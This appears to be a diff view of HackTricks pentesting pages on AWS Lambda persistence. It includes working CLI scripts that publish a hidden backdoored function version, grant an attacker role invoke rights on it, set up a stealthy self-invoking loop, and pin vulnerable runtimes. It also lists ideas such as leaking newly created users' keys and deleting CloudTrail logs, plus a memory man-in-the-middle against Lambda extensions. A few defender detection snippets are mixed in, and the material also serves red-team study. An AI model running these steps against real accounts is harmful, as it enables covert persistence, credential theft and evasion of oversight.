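FN_VER_ARN="arn:aws:lambda:$REGION:<acc_id>:function:<func_name>:1"   # :1 = backdoored version
aws apigateway put-integration --rest-api-id "<api-id>" --resource-id "<res-id>" \
  --http-method POST --type AWS_PROXY --integration-http-method POST \
  --uri "arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$FN_VER_ARN/invocations"
# Let API Gateway invoke that specific version only
aws lambda add-permission --function-name "<func_name>" --qualifier 1 \
  --statement-id apigw-v1 --action lambda:InvokeFunction \
  --principal apigateway.amazonaws.com
aws apigateway create-deployment --rest-api-id "<api-id>" --stage-name prod
```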
### Cron/Event actuator
The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
- Every time a new user is created lambda generates a new user key and send it to the attacker.
- Every time a new role is created lambda gives assume role permissions to compromised users.
- Every time new cloudtrail logs are generated, delete/alter them
### RCE abusing AWS_LAMBDA_EXEC_WRAPPER + Lambda Layers
Abuse the `AWS_LAMBDA_EXEC_WRAPPER` environment variable to execute an attacker-controlled wrapper script before the runtime/handler starts. Deliver the wrapper at `/opt/bin/htwrap` via a Lambda Layer, set `AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap`, then invoke the function. The wrapper runs inside the function's runtime process, inherits the function's execution role, and finally `exec`s the real runtime so the original handler executes normally.
{{#ref}}
aws-lambda-exec-wrapper-persistence.md
{{#endref}}
### AWS - Lambda Async Self-Loop Persistence
Abusing Lambda asynchronous destinations together with the Recursion configuration allows a function to keep invoking itself without any external scheduler (EventBridge, cron, etc.). By default Lambda terminates recursive loops, but setting the recursion configuration to Allow re-enables them. Destinations are delivered server-side for asynchronous invocations, so a single seed invocation creates a stealthy, code-free heartbeat/backdoor channel. Optionally, reserved concurrency can be used to throttle the invocation rate and keep the noise down.
{{#ref}}
aws-lambda-async-self-loop-persistence.md
{{#endref}}
### AWS - Lambda Alias-Scoped Resource Policy Backdoor
Create a hidden Lambda version containing the attacker's logic and use the `--qualifier` argument of `lambda add-permission` to scope a resource-based policy to that specific version (or alias). Grant `lambda:InvokeFunction` on `arn:aws:lambda:REGION:ACCT:function:FN:VERSION` only to the attacker principal. Normal invocations via the function name or the main alias are unaffected, while the attacker can invoke the backdoored version ARN directly.
This is stealthier than exposing a Function URL and does not change the main traffic alias.
{{#ref}}
aws-lambda-alias-version-policy-backdoor.md
{{#endref}}
### Freezing the AWS Lambda Runtime
An attacker with lambda:InvokeFunction, logs:FilterLogEvents, lambda:PutRuntimeManagementConfig and lambda:GetRuntimeManagementConfig permissions can modify a function's runtime management configuration. This attack is particularly useful when the goal is to keep a Lambda function on a vulnerable runtime version, or to preserve compatibility with malicious layers that might not be compatible with newer runtimes.
The attacker pins the runtime version by modifying the runtime management configuration:
```bash
# Invoke the function to generate runtime logs
aws lambda invoke \
--function-name $TARGET_FN \
--payload '{}' \
--region us-east-1 /tmp/ping.json
sleep 5
# Freeze automatic runtime updates on function update
aws lambda put-runtime-management-config \
--function-name $TARGET_FN \
--update-runtime-on FunctionUpdate \
--region us-east-1
```
Verify the applied configuration:
```bash
aws lambda get-runtime-management-config \
--function-name $TARGET_FN \
--region us-east-1
```
Optional: pin to a specific runtime version
```bash
# Extract Runtime Version ARN from INIT_START logs
RUNTIME_ARN=$(aws logs filter-log-events \
--log-group-name /aws/lambda/$TARGET_FN \
--filter-pattern "INIT_START" \
--query 'events[0].message' \
--output text | grep -o 'Runtime Version ARN: [^,]*' | cut -d' ' -f4)
```
Pin the runtime to the specific version:
```bash
aws lambda put-runtime-management-config \
--function-name $TARGET_FN \
--update-runtime-on Manual \
--runtime-version-arn $RUNTIME_ARN \
--region us-east-1
```
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -1,42 +1,46 @@
# AWS - Abusing Lambda Extensions
{{#include ../../../../banners/hacktricks-training.md}}
## Lambda Extensions
Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
### External Extension for Persistence, Stealing Requests & modifying Requests
This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapids heap memory, by design.**
Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request.
The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid.
<figure><img src="../../../../images/image (254).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png</a></p></figcaption></figure>
The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
> [!WARNING]
> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
<figure><img src="../../../../images/image (267).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png</a></p></figcaption></figure>
The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
## References
- [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/)
- [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -1,88 +0,0 @@
# AWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)
{{#include ../../../../banners/hacktricks-training.md}}
## Overview
Use a hidden Lambda version containing the attacker's logic and the `--qualifier` argument of `lambda add-permission` to scope a resource-based policy to that specific version (or alias). Grant `lambda:InvokeFunction` on `arn:aws:lambda:REGION:ACCT:function:FN:VERSION` only to the attacker principal. Normal invocations via the function name or the main alias are unaffected, while the attacker can invoke the backdoored version ARN directly.
This is stealthier than exposing a Function URL and does not change the main traffic alias.
## Required Permissions (Attacker)
- `lambda:UpdateFunctionCode`, `lambda:UpdateFunctionConfiguration`, `lambda:PublishVersion`, `lambda:GetFunctionConfiguration`
- `lambda:AddPermission` (to add version-scoped resource policy)
- `iam:CreateRole`, `iam:PutRolePolicy`, `iam:GetRole`, `sts:AssumeRole` (to simulate an attacker principal)
## Attack Steps (CLI)
<details>
<summary>Publish a hidden version, add a qualifier-scoped permission, and invoke as the attacker</summary>
```bash
# Vars
REGION=us-east-1
TARGET_FN=<target-lambda-name>
# [Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., "main") stays on a clean version
# aws lambda create-alias --function-name "$TARGET_FN" --name main --function-version <clean-version> --region "$REGION"
# 1) Build a small backdoor handler and publish as a new version
cat > bdoor.py <<PY
import json, os, boto3
def lambda_handler(e, c):
    ident = boto3.client("sts").get_caller_identity()
    return {"ht": True, "who": ident, "env": {"fn": os.getenv("AWS_LAMBDA_FUNCTION_NAME")}}
PY
zip bdoor.zip bdoor.py
aws lambda update-function-code --function-name "$TARGET_FN" --zip-file fileb://bdoor.zip --region $REGION
aws lambda update-function-configuration --function-name "$TARGET_FN" --handler bdoor.lambda_handler --region $REGION
until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --region $REGION --query LastUpdateStatus --output text)" = "Successful" ]; do sleep 2; done
VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text)
VER_ARN=$(aws lambda get-function --function-name "$TARGET_FN:$VER" --region $REGION --query Configuration.FunctionArn --output text)
echo "Published version: $VER ($VER_ARN)"
# 2) Create an attacker principal and allow only version invocation (same-account simulation)
ATTACK_ROLE_NAME=ht-version-invoker
ACCT=$(aws sts get-caller-identity --query Account --output text)
cat > /tmp/trust.json <<POL
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::${ACCT}:root"},
    "Action": "sts:AssumeRole"
  }]
}
POL
aws iam create-role --role-name $ATTACK_ROLE_NAME --assume-role-policy-document file:///tmp/trust.json >/dev/null
cat > /tmp/invoke-policy.json <<POL
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": ["lambda:InvokeFunction"],
"Resource": ["$VER_ARN"]
}]
}
POL
aws iam put-role-policy --role-name $ATTACK_ROLE_NAME --policy-name ht-invoke-version --policy-document file:///tmp/invoke-policy.json
# Add resource-based policy scoped to the version (Qualifier)
aws lambda add-permission \
--function-name "$TARGET_FN" \
--qualifier "$VER" \
--statement-id ht-version-backdoor \
--action lambda:InvokeFunction \
--principal arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME \
--region $REGION
# 3) Assume the attacker role and invoke only the qualified version
ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME
CREDS=$(aws sts assume-role --role-arn "$ATTACK_ROLE_ARN" --role-session-name htInvoke --query Credentials --output json)
export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey)
export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken)
aws lambda invoke --function-name "$VER_ARN" /tmp/ver-out.json --region $REGION >/dev/null
cat /tmp/ver-out.json
# 4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role
aws lambda remove-permission --function-name "$TARGET_FN" --statement-id ht-version-backdoor --qualifier "$VER" --region $REGION || true
```
</details>
## Impact
- Grants a stealthy backdoor for invoking a hidden version of the function without modifying the main alias or exposing a Function URL.
- The resource-based policy `Qualifier` limits exposure to only the specified version/alias, shrinking the detection surface while keeping reliable invocation for the attacker principal.
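From the defender's side, a simple hunt is to parse the function's resource policy and flag statements whose `Resource` ends in a numeric qualifier (a published version). A sketch, where the policy document is a hypothetical example of what `aws lambda get-policy` returns:

```python
import json

# Hypothetical policy document for illustration
policy_doc = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ht-version-backdoor",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::111111111111:role/ht-version-invoker"},
        "Action": "lambda:InvokeFunction",
        "Resource": "arn:aws:lambda:us-east-1:111111111111:function:billing-processor:7",
    }],
})

def version_scoped_statements(doc: str):
    """Return Sids of statements whose Resource ends in :<digits> (a version ARN)."""
    flagged = []
    for st in json.loads(doc)["Statement"]:
        res = st.get("Resource", "")
        for r in (res if isinstance(res, list) else [res]):
            if r.rsplit(":", 1)[-1].isdigit():
                flagged.append(st.get("Sid", "<no-sid>"))
    return flagged

print(version_scoped_statements(policy_doc))  # ['ht-version-backdoor']
```

Unqualified function ARNs end in the function name, so legitimate function-wide grants are not flagged by this check.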
{{#include ../../../../banners/hacktricks-training.md}}


@@ -1,95 +0,0 @@
# AWS - Lambda Async Self-Loop Persistence via Destinations + Recursion Allow
{{#include ../../../../banners/hacktricks-training.md}}
Abuse Lambda's asynchronous destinations combined with the recursion configuration to make a function keep triggering itself without any external scheduler (EventBridge, cron, etc.). By default Lambda terminates recursive loops, but setting the recursion config to Allow re-enables them. Destinations are handled server-side for async invokes, so a single initial invoke creates a stealthy, code-free heartbeat/backdoor channel. Optionally throttle with a reserved concurrency limit to reduce noise.
Notes
- Lambda does not allow configuring a function directly as its own destination. Use a function alias as the destination, and allow the execution role to invoke that alias.
- Minimum permissions: read/update the target function's event invoke config and recursion config, publish a version and manage an alias, and update the function's execution role policy to allow lambda:InvokeFunction on that alias.
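The alias indirection from the notes above can be sketched as a simple validation. This mirrors, as an assumption rather than the actual service code, the check that makes Lambda reject a function as its own destination while accepting an alias of that same function:

```python
def destination_allowed(function_arn: str, destination_arn: str) -> bool:
    # A destination identical to the function's own ARN is rejected;
    # an alias ARN of the same function is a distinct string and passes.
    return destination_arn != function_arn

fn_arn = "arn:aws:lambda:us-east-1:111111111111:function:worker"  # hypothetical
alias_arn = fn_arn + ":loop"  # the alias used as the self-referencing target

print(destination_allowed(fn_arn, fn_arn))     # False -> direct self-loop rejected
print(destination_allowed(fn_arn, alias_arn))  # True  -> alias indirection works
```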
## Requirements
- Region: us-east-1
- Vars:
- REGION=us-east-1
- TARGET_FN=<target-lambda-name>
## Steps
1) Get the function ARN and the current recursion config
```
FN_ARN=$(aws lambda get-function --function-name "$TARGET_FN" --region $REGION --query Configuration.FunctionArn --output text)
aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION || true
```
2) Publish a version and create/update an alias (used as the self-referencing target)
```
VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text)
if ! aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION >/dev/null 2>&1; then
aws lambda create-alias --function-name "$TARGET_FN" --name loop --function-version "$VER" --region $REGION
else
aws lambda update-alias --function-name "$TARGET_FN" --name loop --function-version "$VER" --region $REGION
fi
ALIAS_ARN=$(aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION --query AliasArn --output text)
```
3) Allow the function's execution role to invoke the alias (required for Lambda Destinations→Lambda)
```
# Set this to the execution role name used by the target function
ROLE_NAME=<lambda-execution-role-name>
cat > /tmp/invoke-self-policy.json <<EOF
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "lambda:InvokeFunction",
"Resource": "${ALIAS_ARN}"
}
]
}
EOF
aws iam put-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --policy-document file:///tmp/invoke-self-policy.json --region $REGION
```
4) Configure the async destination to the alias (self via alias) and disable retries
```
aws lambda put-function-event-invoke-config \
--function-name "$TARGET_FN" \
--destination-config "OnSuccess={Destination=$ALIAS_ARN}" \
--maximum-retry-attempts 0 \
--region $REGION
# Verify
aws lambda get-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION --query DestinationConfig
```
5) Allow recursive loops
```
aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Allow --region $REGION
aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION
```
6) Trigger a single async invoke
```
aws lambda invoke --function-name "$TARGET_FN" --invocation-type Event /tmp/seed.json --region $REGION >/dev/null
```
7) Observe continuous invocations (example)
```
# Recent logs (if the function logs each run)
aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 20 --region $REGION --query events[].timestamp --output text
# or check CloudWatch Metrics for Invocations increasing
```
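To sanity-check the cadence from the timestamps returned above, a small sketch (the millisecond timestamps are made up for illustration) converts them into inter-invocation gaps; a steady small gap indicates the self-loop is live:

```python
# Hypothetical CloudWatch event timestamps (ms since epoch) from the query above
timestamps = [1717000000000, 1717000002100, 1717000004300, 1717000006400]

# Consecutive gaps in seconds between invocations
gaps = [(b - a) / 1000 for a, b in zip(timestamps, timestamps[1:])]
print(gaps)  # [2.1, 2.2, 2.1]
```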
8) Optional stealth throttling
```
aws lambda put-function-concurrency --function-name "$TARGET_FN" --reserved-concurrent-executions 1 --region $REGION
```
## Cleanup
Break the loop and remove the persistence.
```
aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Terminate --region $REGION
aws lambda delete-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION || true
aws lambda delete-function-concurrency --function-name "$TARGET_FN" --region $REGION || true
# Optional: delete alias and remove the inline policy when finished
aws lambda delete-alias --function-name "$TARGET_FN" --name loop --region $REGION || true
ROLE_NAME=<lambda-execution-role-name>
aws iam delete-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --region $REGION || true
```
## Impact
- A single async invoke makes the Lambda keep invoking itself without any external scheduler, providing stealthy persistence/heartbeat. Reserved concurrency can limit the noise to a single warm execution.
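A defender can hunt for this by comparing each function's async destination against the function's own ARN: a destination that is an alias of the same function is an alias-based self-loop. A sketch with hypothetical ARNs:

```python
def is_self_loop(function_arn: str, destination_arn: str) -> bool:
    """Flag an async destination that is an alias of the same function."""
    return (destination_arn != function_arn
            and destination_arn.startswith(function_arn + ":"))

fn = "arn:aws:lambda:us-east-1:111111111111:function:worker"  # hypothetical
print(is_self_loop(fn, fn + ":loop"))  # True  -> alias-based self-loop
print(is_self_loop(fn, "arn:aws:lambda:us-east-1:111111111111:function:logger"))  # False
```

Combined with a recursion config of Allow, such a finding is a strong indicator of this persistence technique.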
{{#include ../../../../banners/hacktricks-training.md}}

Some files were not shown because too many files have changed in this diff.